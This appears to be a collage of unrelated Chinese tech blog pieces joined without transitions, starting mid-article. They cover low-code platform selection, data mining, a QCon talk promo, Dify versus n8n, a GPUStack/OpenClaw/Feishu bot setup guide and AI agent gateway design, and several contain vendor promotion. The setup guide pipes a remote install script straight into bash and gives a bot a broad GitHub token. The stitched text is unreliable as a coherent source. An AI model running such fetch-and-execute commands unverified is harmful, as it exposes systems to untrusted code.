除非你是自己有服务器,还会搞 Docker 部署,而且特别享受折腾的过程,否则别碰这个。一旦数据库崩了,那个恢复难度能让你怀疑人生。我们是来写笔记的,不是来当运维工程师的。


写在最后

折腾了一圈,最后发现还是简单的方案最好用。
以前没得选,只能手搓 WebDAV。现在既然坚果云(Nutstore)官方都把饭喂到嘴边了,既有公安部三级等保的安全背书,又有专门解决冲突和限流的黑科技,何必还要去折腾那些不稳定的方案呢?

听我的,去下个官方插件试试,把时间省下来多写两篇笔记不香吗?

相关链接这里也放一下(免费试用真挺香):

最近不少朋友来问我(有后台私信的,也有微信上直接找我的):

“老纪啊,低代码这几年太火了,别的公司用得好像也还可以。所以我也想给公司上一个,但网上的排名文章,机构的排名表,AI的排名总结一大堆,都把我看迷糊了,到底该怎么辨别好平台?”

类似的问题,我通常不好直接回答哪家平台好。因为最好的标准,往往因人而异。

我能告诉的是:你在网上能看到的排名表,水分都很大!

比如:你看到的排名文章,大概率都是各家低代码厂商自己发、或者花钱找人发的,内容都是自己写的,然后弄个排名自己家排第一,但排名的依据是什么,他不会说,也说不清。

再比如第三方机构的排名表,他们的排名是怎么得出的?要搞清楚这个之前,你得先知道他们的运作流程。首先,一家机构,他做这个的目的,无非就是为了流量和钱,要不然你真以为他们是慈善机构啊?免费给大家做这些长篇大论、长达几百页的PPT材料,附带各种数据,各种图表和各种说明?明白这一点之后,我们可以知道的是,他们在做这份行业品牌排名表之前,一定会找品牌方提前沟通。怎么沟通呢?

通常流程大概率是这样的:第三方机构对接人先联系各家低代码厂商,跟他们说:“我们联合某某大厂近期要出一份《低代码无代码行业发展分析趋势》,会线上直播发布。里面有个环节是邀请行业专业人士座谈交流。诚邀贵司参加,出席会议的费用大概是几万到几十万不等。此外,我们还提供餐食,还会有某某某行业龙头公司负责人参会。另外,你们参会还可以得到品牌曝光,可以在行业报告里面体现贵司的产品、案例,总体排名也会相对靠前。

......

所以,你以为这些排名是怎么来的,当然大多数是花钱砸出来的呗。

AI的排名总结也是同理,AI的原理是什么?通过大量知识对其进行训练和喂养,而他被喂养的文章从哪里来的?当然是从网上。网上文章怎么写,AI就怎么总结。源头都有水分,总结能没水分吗?

所以很多时候,我们要买一个东西,不能只盯着排名。就像我们去网上买鞋是一样的道理,你不能只看销量排行榜,你还要看你的脚型、是要走路还是要跑步、你心理预算大概在什么范围,等等等等。

低代码选型也一样。所以下面,我打算基于这一问题,跟大家把低代码平台这个“鞋店”里的不同品类理一理。理完之后你自然就清楚了。

当然,这篇文章不是说为了给你一张排名表,而是教你一套选型的思路。有了思路,以后遇到类似问题,都将不再是问题!

先看国际机构的排名,但有件事你得知道

比如Gartner,全球知名的研究和咨询机构,它每年会发布“企业级低代码应用平台魔力象限”。常年位于领先位置的,这家公司虽说也有可能出现我上面所说的情况,但总体内容还是比较权威的,因为人家说的出来依据是什么,比如像它常年介绍材料中出现的厂商名字:

  • OutSystems
  • Appian
  • Microsoft Power Platform
  • Mendix
  • Salesforce
  • Oracle
  • ServiceNow
  • Pega

这些确实在市场上有市场份额的,每年的营收都是有实实在在数据的,对比国内机构搞出的排名,至少信任度更高一些的。

image.png

再比如G2,一个全球知名的软件测评网站,它2025年冬季报告里,把OutSystems评为企业低代码开发平台的第一名,客户满意度90分以上。

这些排名虽说有一定参考价值,但如果你直接拿着这个名单直接下单,可能会出大问题。因为它并不适用我们中国企业。而且里面这些主流低代码厂商主要服务于大型跨国企业,他们的产品设计理念、价格、语言习惯,跟国内企业完全不匹配。更重要的是,排名反映的是综合实力,不代表它最适合你的具体场景。

所以,排名可以看,但不能迷信。咱们需要透过排名看本质。

既然国外产品不合适,国内又没有能完全信任的机构排名表,那怎么办呢?不急,下面讲到的方法,你看完,或许自己就能做排名了。

国内主流低代码平台,先做分类,再做评估

为了让你更清晰地理解,我把国内市场上经常被提到的十几个平台,按照它们的主要特点和适用场景,分成了四类。你可以对号入座,快速找到自己应该关注的方向。

第一类:上手快、见效快的轻量工具

这类平台的代表有:简道云、明道云、伙伴云、活字格。

它们最大的特点是什么?业务人员自己就能用。

比如市场部想建一个客户信息登记表,或者行政部想做一套固定资产台账,不需要懂代码,只要会拖拽,一两天就能搭出来,马上用起来。

这类平台最适合解决部门级的临时需求,让业务人员自己动手,快速响应。但是,如果你想做一个需要复杂计算、跨多个系统集成的核心业务系统,比如ERP(企业资源计划系统),这类平台可能就不够用了。

第二类:擅长梳理和优化业务流程的平台

这类平台的代表有:奥哲、炎黄盈动、蓝凌、泛微。

它们的核心能力是“流程引擎”。一个合同要经过法务、财务、老板三个人审批,中间可能有驳回、有会签、有转办——这类平台能把这种复杂的审批流理得清清楚楚,跑得又快又稳。

它们最适合流程多的企业,比如制造业、大型企业的OA(办公自动化)部门。如果你公司内部各种审批流程复杂,想把这些流程全部数字化并持续优化,可以从这类平台里找。

比如奥哲,现在能做到用自然语言生成应用,你说“帮我建一个请假审批”,它就能自动把流程搭好。

第三类:与常用办公软件深度绑定的平台

这类平台的代表有:钉钉宜搭、腾讯云微搭、飞书低代码。

它们深度集成了钉钉、企业微信、飞书。你在宜搭上搭一个应用,天然就能用钉钉的组织架构、通讯录、消息通知。员工用起来没有学习成本,因为界面就是钉钉。

如果你公司已经深度使用钉钉、企业微信或飞书,想把内部的行政、人事、财务应用都搬上去,这类平台是最佳选择。你能快速开发,快速触达所有员工。

但也要注意:你的应用很难离开这个生态,换别的办公软件就不灵了。

第四类:面向专业IT人员的企业级开发平台

这类平台的代表有:织信Informat、金蝶云苍穹、用友BIP、网易CodeWave。

它们的功能最强大。不仅能搭页面,还能做复杂的数据建模、跨系统集成(比如连接SAP、Oracle等老系统),支持多人协同开发、代码版本管理、自动化测试等专业软件工程能力。

织信Informat的能力边界很强,提供无代码(70%)+低代码(20%)+传统编码(10%) 组合式开发,灵活适配不同复杂程度的开发工作。能提高效率,也能解决问题。

网易CodeWave甚至支持导出源码,你用低代码开发的应用,可以把代码拿回来自己维护,完全不用担心被平台锁定。

金蝶云·苍穹和用友BIP,因为背靠金蝶、用友几十年的企业服务经验,天然与财务、人力、供应链等核心业务深度融合。你想搭一个费用控制系统,它直接就能调用金蝶的财务引擎。

这类平台最适合IT部门牵头,开发企业的核心业务系统,或者对外交付软件产品。它们关注的是长期演进、技术可控和业务稳定。

怎么选?问自己两个问题

看完这四类,你可能会问:那我到底该选哪个?

很简单,先问自己两个问题。

第一问题,你是想“快速搭个工具”,还是想“长期做个系统”?

如果是前者,比如这个月市场部急需一个活动报名工具,那就从第一类或第三类里找,一两天搞定,用完即止。

如果是后者,比如你想把公司的进销存系统全部重构,那就要从第二类或第四类里找,并且做好打持久战的准备。

第二问题,这件事是“业务部门自己做”,还是“IT部门牵头干”?

如果是业务部门自己折腾,那就选第一类,业务人员自己就能学会。

如果是IT部门要建设企业级平台,那就得考虑第四类,功能更全面,交付更可控。

最后,一定,一定,一定要亲自测试!

无论你看中了哪个平台,正式采购前,建议做一个小范围的概念验证(POC,Proof of Concept)。

不要光听销售讲PPT,也别只看别人的演示。就挑你业务中最核心、最复杂的一个小场景,让厂商的技术人员现场搭给你看,或者你自己上手试一试。

看看它处理复杂逻辑是否顺畅,能不能和你现有的系统打通,响应速度是否够快。只有自己试过,才知道合不合用。

低代码平台没有绝对的第一名,只有最适合你当前阶段、当前业务的那个。

选低代码,不是为了赶技术潮流,而是为了给你的组织带来价值、提升效率。从这个角度出发,你自然能找到对的它。

数据挖掘是什么?这东西到底怎么落地?

今天我正好把这几年的心得整理出来,希望能帮到你。

一、数据挖掘到底是什么?

简单来说,数据挖掘就是从大量数据里找出隐藏的规律。 这些数据可能有缺失、有错误、格式也不统一,但通过算法,我们能从中提取出之前不知道、但确实有用的信息。它融合了机器学习、数据库技术、统计学等多个领域的方法。

我一直强调,它的核心是让算法自己去探索数据之间的关联和模式,把那些杂乱无章的数据变成能指导决策的依据。

二、数据挖掘和数据分析,有什么区别?

这个问题经常有人问。

我发现很多公司招人的时候,这两个岗位的职责也经常混在一起。

用过来人的经验告诉你,它们确实是两码事。

1、数据分析

重点在“分析”。你得有一定的数据敏感度,知道在什么情况下该看什么指标。

比如用Excel或者BI工具统计一下上季度的销售额是多少,哪个区域的用户最活跃,这就是典型的数据分析。它回答的问题是发生了什么。

2、数据挖掘

重点在“挖掘”。它对你的要求是要熟悉算法和建模工具,知道面对什么样的业务需求应该用什么方法来解决。

比如预测下个月哪些客户最有可能流失,这就是数据挖掘要干的活。它回答的问题是将会发生什么。

现在很多公司会把这两类人放在一个部门里,数据分析师负责提需求、看报表,数据挖掘工程师负责建模型、跑算法。两者配合好了,效果是1+1大于2的。

不过话说回来,这两者其实是一个递进的关系。 你想想,是不是得先把发生了什么搞清楚,才能去研究为什么会发生,之后才能预测将会发生什么,最后才能回答我们该怎么做。

三、数据挖掘能用在哪些地方?

这些年我接触过的行业不少,发现数据挖掘的应用场景比大多数人想象的要广。挑几个最常见的给你讲讲。

1、电商零售是我最早接触的领域。

刚开始的时候,大家做的事情其实挺简单的,就是统计一下哪些商品卖得好,哪些用户买得多。

后来慢慢发现,这些数据背后藏着很多有意思的东西。

  • 比如通过分析用户的浏览和购买记录, 可以给每个人推荐他可能喜欢的商品。
  • 分析购物篮里的商品组合, 会发现买电饭煲的人经常会同时买量杯,买啤酒的人周末晚上买零食的概率特别高。这些规律一旦找出来,就能用来调整货架摆放、设计促销活动。

有家电商平台用了这些方法之后,销售额涨了将近三成。其实道理很简单,你把用户想要的东西送到他面前,他自然愿意掏钱。

2、金融行业对数据挖掘的需求一直很旺盛。

银行每天要处理大量贷款申请, 哪些人该批、哪些人不该批,光靠人工判断太慢了。用历史数据建一个信用评分模型, 输入申请人的收入、职业、过往还款记录,模型就能输出一个分数,分数高的直接批,分数低的人工复核。这样既快又准。

支付平台那边,天天要防诈骗。就用异常检测算法识别那些半夜在异地登录、大额转账的可疑交易。

实际上,还有医疗、智慧城市建设等项目都要用到数据挖掘。

这些场景你可能在自己的行业里也遇到过。只不过有的是已经开始做了,有的是还停留在想想的阶段。

四、动手之前,先把这三个问题想明白

最近我发现一个现象:很多团队拿到数据就急着建模跑算法,好像谁跑得快谁就赢了。结果往往是模型建了一堆,能用上的没几个。

根据我的经验,你正式动手之前,至少要把下面三个问题掰扯清楚。

问题1:你到底想解决什么具体问题?

是让复购率提高10%,还是让库存周转缩短5天?目标必须具体、可衡量。

如果你只说想把业务做好,那后面的所有努力都没办法聚焦。

我一直强调,模糊的目标只能带来模糊的结果。

问题2:你手里的数据够不够用?

你得盘点一下:数据从哪来?质量怎么样?有没有关键信息是缺失的?

要是数据本身就有问题,再牛的算法也跑不出靠谱的东西。数据挖掘最怕的不是技术不行,而是数据基础不牢。

问题3:搞出来的结果谁能用、怎么用?

你想想,模型建好之后,是要给市场部做人群圈选,还是给运营做自动化推送?

如果业务部门根本用不上,或者和现有流程对不上号,那这个项目就只能烂在服务器里。

我之前见过一个团队,花了半年时间做了一套非常精细的客户分群模型,结果业务同事看不懂标签含义,没人敢用。你说可惜不可惜?

五、技术工具怎么选?

说实话,我第一次接触那么多算法的时候也晕。逻辑回归、决策树、随机森林、XGBoost、神经网络等等,名字都记不全,更别说选了。

后来我慢慢想明白了,其实80%以上的业务问题,用逻辑回归或者决策树就能搞定。 这些算法解释起来容易,业务部门能听懂、敢用。那些复杂的深度网络,除非你在处理图像、语音、文本这类数据,否则真没必要一上来就上。

工具方面:

  • Python是目前的主流, 库多、社区活跃,遇到问题随便一搜就能找到答案。
  • R在统计分析和可视化上有积累, 也值得学。
  • 如果你刚入门,不想写代码, 阿里云、腾讯云的机器学习平台都有拖拽式界面,上手快,适合业务人员先试试水。

你可能会问到底该选哪个?

我建议你从最熟悉的入手,先跑通一个小闭环,再慢慢拓展。别纠结工具,关键的是你对业务的理解和对数据的判断。

六、最容易遇到的问题

这些年经历过的失败,我总结了几条,希望你能避开。

1、数据质量不过关就硬上。

这是最大的失误。我在前面也提到了数据质量要过关,这里再提一下。

真实世界的数据有多乱,只有处理过的人才知道。有缺数据的、有格式不对的、有明显是乱填的。你得把它们清洗、补全、转成统一格式。

我一直强调,数据预处理做得越细,后面的模型就越稳。

我在做数据预处理的时候,常用到FineDataLink这个数据处理工具。

最大的感受就是它对数据清洗和整合的支持特别好, 可以把来自不同数据库、不同格式的数据自动采集过来,通过拖拽的方式完成清洗和转换,不用写太多代码。特别是面对那些多源异构数据的时候,能省下不少时间。

2、忽视模型的解释性。

特别是在金融、医疗这些行业,模型为什么这么判断,得有清晰的说法。 算法再准,如果说不清楚道理,也没人敢用。

选算法的时候,你尽量挑那些能输出重要特征、有决策路径的。

3、上线之后不管了。

模型不是一次性产品。用户行为在变,市场环境在变,模型的效果会慢慢下降。

你得定期看看它的表现,该更新就更新,该重新训练就重新训练。

七、未来会往哪儿走?

最后说说我对这个领域的一点看法。

1、门槛会越来越低。

现在自动化机器学习的工具越来越成熟,未来很多常规的挖掘任务,可能鼠标点几下就完成了。

但这不代表数据从业者会失业,相反,我们的工作重心会从怎么调参数转向怎么定义问题和怎么让结果落地。

2、数据挖掘会和业务结合得更深。

它会像Excel一样,慢慢变成每个业务人员的日常工具。运营、市场、产品,这些岗位自己就能做一些基础的预测和分析。

3、隐私计算、联邦学习这些新技术会越来越重要。

数据安全和用户隐私的监管越来越严,如何在保护隐私的前提下做挖掘,是所有企业都要面对的课题。

不过话说回来,不管技术怎么变,数据挖掘的核心还是那几样: 对业务的理解、对数据的敏感、把问题拆清楚的能力。这些基本功,永远都是重要关键的。

今天聊得可能比较散,但都是我这些年的经验。希望能对你有帮助。

从「AI For What」到「Value From AI」,100+可落地实践案例打通 AI 实战最后一公里!

4 月 16 日-4 月 18 日,QCon 全球软件开发大会将在北京举办。本届大会锚定 Agentic AI 时代的软件工程重塑,聚焦 Agentic AI、多智能体协作、算力优化、技术债治理、多模态和 AI 原生基础设施等前沿话题,邀请来自腾讯、阿里、百度、华为、蚂蚁、小米、网易等企业技术专家,带来百余项真实落地案例,系统性分享前沿洞察与实战干货,以技术共创探索 AI 落地新路径。

蚂蚁集团医疗健康资深专家郭春晓已确认出席 “Agent in Practice:千行百业的 Agent 实践” 专题,并发表题为蚂蚁阿福:从 0 到生产的医疗 Agent 工程化落地的主题分享。随着大模型与智能体(Agent)技术的快速发展,如何高效构建一个 Agent,以及在过程中做好评估、可观测等效果,成为核心话题。蚂蚁提出了 EBDD(评测集和 badcase 驱动的开发方式)驱动的研发模式不断地驱动了智能体的开发并构建了核心的如 RAG、context、记忆等核心能力并在多个榜单取得 SOTA 的成绩。本次演讲将探讨蚂蚁阿福如何在从 0 到生产的医疗 Agent 工程化落地,体系化地了解 Agent 构建背后的技术体系以及技术布局。

郭春晓,作为蚂蚁集团的资深技术专家和五福红包架构师,拥有多项技术专利与论文,当前研究 Agent 技术与大规模 RL 训推 Scale 等方向。他在本次会议的详细演讲内容如下:

演讲提纲

  1. 蚂蚁阿福 Agent 的痛点、挑战

  • 工业级大规模研发的痛点

  • 医疗 Agent 的核心挑战

  • Agent 研发范式与传统研发范式的区别

2. Agent 研发范式的北极星指标与技术体系

  • 评测体系的建设 EBPP

  • 评测和 badcase 驱动的研发模型

  • 技术体系的建设

  • 上下文工程、RAG、医疗个性化、推理加速

3. 医疗上下文的挑战

  • 长上下文的处理

  • 主子 Agent 的上下文的共享

4. 从 RAG 到 Agent RAG 的实战

  • Agentic RAG 的架构与医疗询证检索

5.医疗个性化

  • 个性化的挑战与难点

  • 医疗个性化的解决方案

6.推理加速

  • 常见的性能优化方案

  • 如何优化 TTFT、TPOT 以及最佳实践

7.总结与展望

  • 未来架构展望

这样的技术在实践过程中有哪些痛点?

  • 如何从最小评测集开始,设计一个适合当时生产力的方案

  • 医疗 Agent 中处理解决幻觉与正确性的关键问题

  • 如何在推理成本与用户体验平衡

演讲亮点

踩坑经验与架构创新:深入剖析 Agent 架构优化与演进历程,体系化地了解工业级的 Agent 背后的实战与选择。

听众收益

  • 全面了解蚂蚁阿福内部从 0 到 1 构建医疗 Agent 的实践历程

  • 深入理解其中每个技术选型的过程与心得

  • 体系化地了解 Agent 构建背后的技术体系以及技术布局

除此之外,本次大会还策划了Agentic Engineering多模态理解与生成的突破记忆觉醒:智能体记忆系统的范式重塑与产业落地具身智能与物理世界交互Agent Infra 架构设计AI 重塑数据生产与消费AI 原生基础设施AI 驱动的技术债治理小模型与领域适配模型大模型算力优化Agent 可观测性与评估工程AI for SRE等 20 多个专题论坛,届时将有来自不同行业、不同领域、不同企业的 100+资深专家在 QCon 北京站现场带来前沿技术洞察和一线实践经验。

更多详情可扫码或联系票务经理 18514549229 进行咨询。

一、为什么这个问题让人头疼

去年用 LangChain 搭了一套企业内部知识库,文档解析、Embedding、向量检索、重排序、对话记忆……每一层都要自己糊代码。跑通之后,同事问能不能加个"追问"功能。改了三天,引入了一个新 bug。这是很多人踩过的坑:LangChain 是框架,不是产品。它给你乐高积木,但不帮你拼。适合需要深度定制的场景,但如果你的需求是"快速跑通一个 AI 工作流",它的抽象层太多,调试成本极高——社区常见抱怨是链路追踪困难,一个 Chain 报错,堆栈信息往往要翻五层才能找到根因。真正的问题不是 LangChain 不好,而是大多数团队并不需要它提供的那层灵活性。 

二、方案对比:你真正需要了解的差异

LangChainDifyn8n定位代码框架AI 应用平台通用工作流自动化RAG 支持自己搭内置知识库依赖插件/API上手门槛高(需熟悉 Python)低(可视化配置)中(节点拖拽)适合场景高度定制化 AI 应用快速部署 AI 助手/问答跨系统数据流转底层设计逻辑的差异在这里:Dify 是"以 AI 对话为中心"设计的,知识库、Prompt 管理、模型切换都是一等公民;n8n 是"以数据流转为中心"设计的,AI 节点只是几百个节点里的一类,它真正擅长的是"触发器 → 处理 → 发送到第三方系统"这条链路。选型建议:要搭 RAG 知识库或 AI 客服,直接用 Dify;要做"Slack 消息触发 → AI 总结 → 写入 Notion"这类跨系统自动化,选 n8n。两者不互斥,很多团队同时在用。

三、5 分钟上手Dify

# 自托管启动
git clone https://github.com/langgenius/dify && cd dify/docker
docker compose up -d
# 通过七牛云 AI 推理服务调用(兼容 OpenAI API 格式)
from openai import OpenAI

client = OpenAI(
    api_key="YOUR_QINIU_API_KEY",
    base_url="https://api.qiniuapi.com/v1",
)

response = client.chat.completions.create(
    model="deepseek-v3",
    messages=[{"role": "user", "content": "总结这段文档..."}]
)
# Dify 自定义模型配置填入相同 base_url 即可

在 Dify 的「设置 → 模型供应商 → 自定义」里填入七牛云的 API Key 和 base_url,就能在知识库问答流程里直接切换模型,无需改一行应用代码。实测在 10 万 token 的文档语料下,首次检索延迟约 800ms,远低于自己搭向量库的 2-3 秒冷启动。n8n 的情况类似,npm 上有官方的 n8n-nodes-qiniu-ai 插件,支持 Claude、GPT、DeepSeek、Kling 等模型节点,拖进工作流即用,不用手写 HTTP 请求。避坑提示:Dify 的知识库默认用余弦相似度检索,如果你的文档是代码或结构化数据,改用混合检索(关键词 + 向量)准确率能提升约 30%,这个配置藏在「知识库 → 检索设置」里,很多人没注意到。
延伸阅读:
● 七牛云 Dify 插件:GitHub - qiniu/dify-plugin(https://github.com/qiniu/dify-plugin
● n8n 七牛云 AI 节点:n8n-nodes-qiniu-ai - npm (https://www.npmjs.com/package/n8n-nodes-qiniu-ai

这两年,越来越多团队把 AI 接入了日常工作流。
但很快,一个现实问题摆在了面前:

模型用得越多,Token 花得越快,成本和心理压力也随之上涨。

很多人一边依赖 AI 提效,一边又不得不「省着用」「少让它多想」。
到最后,AI 反而成了一种被精打细算的消耗品。

如果 AI 能跑在自己的 GPU 上,
不按 Token 计费、可以随时对话、长期运行在协作工具里,
它才更像一个真正的“工作助手”。

基于 GPUStack 提供的本地模型能力,结合 OpenClaw(支持 WhatsApp、Telegram、Discord、Slack、飞书等多种协作平台) 与飞书,
本文将一步步演示如何构建一个可真实使用、可持续运行、几乎不再关心 Token 消耗的本地 AI 助手。

📌 本文内容

  1. 使用 GPUStack 部署模型
  2. 飞书机器人应用创建与权限配置
  3. OpenClaw 的安装、配置与关键注意事项
  4. 飞书侧首次授权与连通性测试
  5. 实战示例:让小助手给 GPUStack 项目标星
  6. 小助手内置指令说明
  7. OpenClaw 实用命令与资源入口

一、使用 GPUStack 部署模型并准备接入信息

在接入 OpenClaw 之前,我们需要先在 GPUStack 中完成模型部署,并获取模型服务的访问信息。

本节将以 Qwen3.5-35B-A3B 为例,演示从
自定义推理后端 → 部署模型 → 获取接入信息 的完整流程。

1. 准备环境与版本说明

  • GPUStack 版本:v2.0.3
  • 自定义推理后端镜像:
    swr.cn-south-1.myhuaweicloud.com/gpustack/vllm-openai:qwen3_5
  • 模型权重:Qwen/Qwen3.5-35B-A3B
⚠️ OpenClaw 对模型上下文窗口有要求:
最小 16K,建议 128K 及以上

2. 配置自定义推理后端(vLLM)

在 GPUStack 控制台中,进入:

「推理后端」→「编辑 vLLM」→「添加版本」

添加 vLLM 版本

3. 部署 Qwen3.5-35B-A3B 模型

部署模型
配置参数

参数示例:

--tensor-parallel-size=2
--mm-encoder-tp-mode data
--mm-processor-cache-type shm
--reasoning-parser qwen3
--enable-auto-tool-choice
--tool-call-parser qwen3_coder
--speculative-config '{"method": "mtp", "num_speculative_tokens": 1}'

如果遇到:

Error 803: system has unsupported display driver / cuda driver combination

可尝试添加环境变量:

LD_LIBRARY_PATH=/usr/local/nvidia/lib64:/usr/local/nvidia/lib:/usr/lib/x86_64-linux-gnu

4. 获取 GPUStack 模型接入信息

需要记录以下三项:

  • API Base URL
  • Model ID
  • API Key(在 GPUStack 中自行创建)

获取连接信息

二、飞书应用配置

1. 账号说明

飞书 个人账号无法创建机器人应用
需要使用 企业 / 组织身份,但个人用户也可以免费创建

创建方式(桌面端):

  • 飞书左下角「⋯」 → 登录更多账号
  • 选择 创建新账户
  • 角色选择 企业或组织负责人

创建企业账号

创建完成后,按提示设置 姓名企业 / 组织名称

完善信息

2. 创建企业自建应用

  1. 打开 https://open.feishu.cn/app?lang=zh-CN
  2. 登录企业 / 组织账号
  3. 点击 创建企业自建应用
  4. 填写应用名称与描述(图标可选)

创建应用
应用信息

3. 启用机器人能力

  • 左侧菜单进入 添加应用能力
  • 添加 机器人 能力

启用机器人

4. 批量导入权限

进入 权限管理 → 批量导入,使用以下 JSON 覆盖默认权限配置:

{
  "scopes": {
    "tenant": [
      "aily:file:read",
      "aily:file:write",
      "application:application.app_message_stats.overview:readonly",
      "application:application:self_manage",
      "application:bot.menu:write",
      "contact:contact.base:readonly",
      "contact:user.employee_id:readonly",
      "corehr:file:download",
      "event:ip_list",
      "im:chat.access_event.bot_p2p_chat:read",
      "im:chat.members:bot_access",
      "im:message",
      "im:message.group_at_msg:readonly",
      "im:message.p2p_msg:readonly",
      "im:message:readonly",
      "im:message:send_as_bot",
      "im:resource"
    ],
    "user": [
      "aily:file:read",
      "aily:file:write",
      "im:chat.access_event.bot_p2p_chat:read"
    ]
  }
}
⚠️ 公众号中直接复制时,注意空格可能会被替换为 NBSP。

导入权限

提交权限申请:

申请权限

⚠️ 权限变更后必须创建并发布新版本,否则不生效。

版本发布

记录 App ID / App Secret

App ID & Secret

飞书侧还有一项配置,需要在接入 OpenClaw 后进行,后文说明。

三、安装并配置 OpenClaw

演示环境:Ubuntu 24.04

1. 一键安装

curl -fsSL https://openclaw.ai/install.sh | bash

脚本会自动安装 Node、Git 等依赖。

安装过程

熟悉 Linux / Node 的用户,
推荐使用 fnm + pnpm 手动安装,Node 版本管理更清晰。
手动安装后需执行:

openclaw onboard --install-daemon

2. 交互式配置向导

  • Model/Auth Provider
    选择 Custom Provider (Any OpenAI or Anthropic compatible endpoint)

模型提供商

  • 填写 GPUStack 的 API Base URL / API Key

API 配置

  • Channel 选择 Feishu / Lark

选择飞书

填写 App ID / App Secret
Group chat policy 建议选择:

Open - respond in all groups (requires mention)

飞书配置

3. 手动调整上下文窗口(必做)

OpenClaw 默认上下文长度为 4096,需手动修改。

vim ~/.openclaw/openclaw.json

修改配置

本文示例中默认上下文长度被设成 4096,不同 OpenClaw 版本或模型下出现差异均属正常,无需深究。

重启网关:

openclaw gateway restart

4. 设置飞书事件订阅方式(关键)

事件订阅方式 设置为 长连接,并添加 接收消息 事件:

长连接订阅方式

⚠️ 修改后需 创建并发布新版本,否则机器人无法接收消息。

四、首次授权与测试

  1. 在飞书中向机器人发送消息
  2. 首次会提示 Pairing 授权
  3. 在服务器执行:
openclaw pairing approve feishu <Pairing-Code>

授权完成

如果出现反复授权,并提示:

duplicate plugin id detected

可尝试:

rm -rf ~/.openclaw/extensions/feishu
openclaw gateway restart

五、实战示例:让机器人给 GPUStack 项目标星

1. 准备 GitHub PAT

  • 使用 Tokens (classic)
  • 勾选 repo 权限

GitHub PAT

2. 写入环境变量

vim ~/.openclaw/.env

env 文件

重启:

openclaw gateway restart

3. 飞书中发送指令

飞书指令
执行结果

六、常用指令说明

  • /new:开启新会话
  • /status:查看 Bot 状态
  • /reset:重置上下文
  • /model:查看 / 切换模型

七、OpenClaw 实用命令与资源入口

常用 CLI 命令

openclaw logs --follow
openclaw doctor
openclaw gateway --help
openclaw dashboard
openclaw tui

文档与生态

结语:当 AI 成为基础设施,而不是消耗品

回过头看,Token 焦虑的本质,并不是模型贵,而是 AI 被当成了一种“外部消耗资源”。

当模型运行在云端、能力掌握在别人手里时,
我们习惯于精打细算、限制使用、控制调用频率。

而当模型真正跑在自己的 GPU 上,
当推理能力、上下文和工具调用都变成基础设施的一部分,
AI 的角色也随之发生了变化——

它不再是一次次付费调用的 API,
而是一个随时可用、长期在线、持续演进的工作助手

这正是 GPUStack 与 OpenClaw 组合所带来的意义:
让 AI 从“成本项”,回归为“生产力”。

如果你已经拥有 GPU 资源,
不妨亲手试一次,把 AI 真正接进你的日常工作流里。

当你不再关心 Token 的时候,
你才会真正开始用好 AI。

🙌 加入 GPUStack 社区

如果你已经开始使用 GPUStack,
或者正在探索 本地大模型 / GPU 资源管理 / AI Infra
欢迎加入我们的社区交流群,一起交流实践经验、踩坑记录与最佳方案。

👉 社区入口(持续更新)
https://github.com/gpustack/gpustack/blob/main/docs/assets/wechat-group-qrcode.jpg

问题:无护栏的智能体

许多工程团队正在尝试超越传统的脚本和管道进行自动化。一些组织开始将操作任务委托给自主或半自主智能体,而不是人类通过仪表板点击或手动批准更改,这种做法通常被称为“点击操作”。这些智能体可能会生成基础设施变更、触发部署或响应操作信号,几乎不需要或根本不需要人为干预。与传统的 CI/CD 机器人不同,它们执行预定义的管道,具有静态权限和确定性输入,智能体驱动的系统在运行时引入了动态决策和跨系统操作。

这种转变引入了一类新的风险。与传统自动化不同,传统自动化通常限于单一工具或工作流程,AI 驱动的智能体通常跨多个系统操作:CI/CD 平台、云 API、基础设施即代码工具和内部服务。当这些智能体被赋予广泛或持久的权限时,它们实际上继承了与高度特权的人类操作员相同的访问级别,但却没有相同的上下文判断或问责机制。

例如,在多区域部署中,一个备用区域可能不会主动为流量提供服务,但对于故障转移至关重要。响应成本优化或修复信号的智能体可能会将流量不足误解为未使用的容量,并修改或终止备用区域中的资源,当稍后的流量从主区域故障转移时,由于没有明确的批准轨迹或人为决策点来追究责任,从而造成严重影响。

在这个领域失败的后果是显而易见的。智能体对指令的错误解释可能会启动具有破坏性的基础设施更改,例如破坏环境或修改生产资源。被泄露的智能体身份可能被滥用以窃取机密、创建未经授权的工作负载或大规模消耗资源。在实践中,团队通常很晚才发现这些问题,因为传统的日志记录了发生了什么,但没有记录智能体决定首先采取行动的原因。

对于组织来说,这种责任带来了操作和治理方面的挑战。事件变得更难调查,变更批准被无意地绕过,安全团队留下了不完整的审计跟踪。随着时间的推移,这个问题会侵蚀对自动化本身的信任,迫使团队要么回滚智能体的使用,要么接受不断增加的未管理风险。

一种方法是完全限制或阻止智能体驱动的操作,但这种操作破坏了智能体要提供的价值。一种更可持续的方法是在智能体和它们所操作的系统之间引入一个显式的控制层。在本文中,我们重点讨论 AI 智能体网关,这是一个专用的边界,它验证意图,将策略作为代码强制执行,并在任何基础设施或服务 API 被调用之前隔离执行。

该模型没有将智能体视为有特权的参与者,而是将其视为不可信的请求者,其行为必须被授权、约束、观察和包含。

设计原则

在深入研究单个原则之前,它有助于在结构层面上建立什么是 AI 智能体网关,借鉴已建立的生产安全和平台模式,而不是特定于 AI 的理论。

在核心层面,网关充当自主智能体和基础设施系统之间的控制边界。智能体从不直接与基础架构 API 交互。相反,每个请求都要通过一个集中式网关,该网关验证意图,强制执行授权规则,并将执行委托给隔离的、短暂的环境。这种分离允许组织引入人工智能驱动的自动化,而无需让智能体持续或无限制地访问关键系统。

图 1 提供了此架构的宏观层次视图,并显示了来自 AI 智能体的请求如何通过策略评估、受控执行和可观测性流。与简单的 API 包装器或代理不同,网关不直接转发智能体请求。它将意图验证、策略决策和执行外部化到单独的组件中,防止智能体持有凭据或调用基础设施 api 本身。

图 1:AI 智能体网关的宏观架构(Debnath,2026)

有了这种结构,网关架构遵循以下设计原则:

  • 策略作为代码将授权逻辑外部化为声明性策略(OPA),避免在应用程序代码中硬编码访问规则。

  • 最小权限防止智能体直接与基础设施 API 通信。网关调解每个请求,并将执行限制在所需的最低权限。

  • 短暂的执行迫使操作在短暂的、隔离的环境中运行,这些环境在执行后立即被销毁。

  • 默认的可观测性跟踪每个请求和执行,产生跟踪、指标和审计日志,并启用检查和事后分析。

  • 版本控制和可审计性通过使用计划哈希、幂等键和不可变作业元数据来跟踪请求,确保可重复性和可追溯性。

  • 本地优先,云就绪在本地运行相同的架构进行实验和测试,同时保持可移植到生产环境。

参考架构

